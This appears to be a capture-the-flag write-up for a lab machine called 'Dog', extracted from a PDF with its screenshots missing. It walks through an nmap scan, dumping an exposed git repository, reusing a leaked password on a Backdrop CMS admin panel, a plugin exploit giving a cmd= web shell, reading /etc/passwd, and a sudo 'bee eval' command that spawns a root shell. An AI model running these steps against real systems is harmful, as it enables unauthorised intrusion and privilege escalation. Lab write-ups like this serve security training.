Dog
Dog
Port Scan
nmap -sV -A -T4 -p- [Link] -o port_scan
Starting Nmap 7.95 ( [Link] ) at 2025-03-09 15:26 CET
Nmap scan report for [Link]
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux;
protocol 2.0)
| ssh-hostkey:
| 3072 [Link] (RSA)
| 256 [Link] (ECDSA)
|_ 256 [Link] (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Home | Dog
| http-git:
| [Link]:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file
'description' to name the...
|_ Last commit message: todo: customize url aliases.
reference:[Link]
|_http-generator: Backdrop CMS 1 ([Link]
| [Link]: 22 disallowed entries (15 shown)
| /core/ /profiles/ /[Link] /[Link] /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
[Link] .
Nmap done: 1 IP address (1 host up) scanned in 625.89 seconds
FootHold
By Nmap we have .git repository found:
1/9
� Dog
With Git-Dumper we can clone the repository:
Fromt [Link] we found a DB password: BackDropJ2024DS2024
2/9
� Dog
In /dump/files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active of the
dumped directory :
Use these credentials to login on [Link]:
tiffany@[Link]:BackDropJ2024DS2024
We are able to login in the admin panel:
3/9
� Dog
With this exploit from ExploitDB we are able to craft a malicious plugin to gain
RCE:
4/9
�Dog
5/9
� Dog
Now we can reach the shell trough: [Link]
cmd=whoami
Read the content of /etc/passwd:
6/9
� Dog
ssh johncusack@[Link]:BackDropJ2024DS2024
We can run /usr/bin/bee as sudo:
sudo bee --root=/var/www/html eval 'system("/bin/bash");'
7/9
�Dog
8/9
�Dog
9/9
